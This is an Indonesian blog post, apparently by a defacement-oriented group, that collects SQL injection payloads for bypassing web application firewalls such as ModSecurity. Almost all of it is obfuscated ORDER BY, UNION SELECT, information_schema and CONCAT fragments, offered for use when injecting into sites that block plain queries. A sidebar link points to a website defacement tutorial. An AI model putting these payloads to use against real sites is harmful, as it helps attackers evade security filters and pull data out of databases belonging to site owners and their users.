kumpulan waf bypass forbidden sqli

MataKucing November 16, 2020 0 Komentar

Assalamualaikum,

Kalian pasti tidak asing lagi dengan sql injection. Untuk yang belum tau apa itu sql injection klik di sini

Nah kalian pasti pernah saat melakukan inject ke suatu web pasti sering forbidden/di pasang mod security, dalam materi kali ini gw bakal membagikan waf bypass forbidden

Ini beberapa waf bypass yang kami telah sediakan :

[+]ORDER BY[+]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[+]UNION SELECT[+]

or .0union/**/distinctrow select/**/distinctrow+

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/

+#uNiOn+#sEleCt

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/*!%55NiOn*/ /*!%53eLEct*/

/*!u%6eion*/ /*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union (/*!/**/ SeleCT */ 1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/ /*!SelECt*/

+union+distinct+select+

+union+distinctROW+select+

uNiOn aLl sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni<on all="" sel="">/*!20000%0d

%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union (select 1111,2222,3333)

uNioN (/*!/**/ SeleCT */ 11)

union (select 1111,2222,3333)

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/

%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

/union\sselect/g

/union\s+select/i

/*!UnIoN*/SeLeCT

+UnIoN/*&a=*/SeLeCT/*&a=*/

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+’UnI”On’+'SeL”ECT’

+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+

/*!u%6eion*/ /*!se%6cect*/

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/ /^.*select.*$/

/*union*/union/*select*/select+

/*uni X on*/union/*sel X ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+

+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

INFORMATION_SCHEMA.TABLES

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[+] CONCAT() [+]

CoNcAt()

concat()

CON%08CAT()

CoNcAt()

%0AcOnCat()

/**//*!12345cOnCat*/

/*!50000cOnCat*/(/*!*/)

unhex(hex(concat(table_name)))

unhex(hex(/*!12345concat*/(table_name)))

unhex(hex(/*!50000concat*/(table_name)))

Sudah sekian dari saya wassalamualaikum

konten menarik lainya :

Official Blogger — Lumajang Team Security

kumpulan waf bypass forbidden sqli

Baca juga

Post a Comment

Post a Comment

Contributor

Label List

Popular Post

Cara Deface Poc Symlink Get Config

10 Alat Sumber Terbuka untuk Penulis

Pengertian dan Fungsi Wireshark